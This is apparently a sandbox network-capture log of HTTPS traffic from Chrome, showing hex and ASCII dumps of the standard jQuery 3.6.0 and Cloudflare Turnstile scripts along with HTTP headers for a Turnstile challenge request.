                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                                            2024-12-03 17:58:50 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                                            2024-12-03 17:58:51 UTC16381INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                                            2024-12-03 17:58:51 UTC16384INData Raw: 7d 29 2c 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e
                                                                                                                                                                                                                                                                            Data Ascii: }),S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.
                                                                                                                                                                                                                                                                            2024-12-03 17:58:51 UTC7584INData Raw: 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22
                                                                                                                                                                                                                                                                            Data Ascii: end:function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            12192.168.2.449758104.18.94.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:51 UTC383OUTGET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:52 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 47695
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                                                                                            last-modified: Thu, 21 Nov 2024 17:58:42 GMT
                                                                                                                                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5727f78984229-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                                                                                                                                                                            Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                                                                                                                                                                                                                            Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                                                                                                                                                                                                                            Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                                                                                                                                                                                                                                                                            Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                                                                                                                                                                                                                                                                            Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26
                                                                                                                                                                                                                                                                            Data Ascii: nonexistent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f
                                                                                                                                                                                                                                                                            Data Ascii: oto__||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")thro
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72
                                                                                                                                                                                                                                                                            Data Ascii: nt)&&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1369INData Raw: 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79
                                                                                                                                                                                                                                                                            Data Ascii: sName="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.sty


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            13192.168.2.449757104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:51 UTC801OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                            Referer: https://j9lg.xbyhiqbjl.com/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:52 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:52 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 26460
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
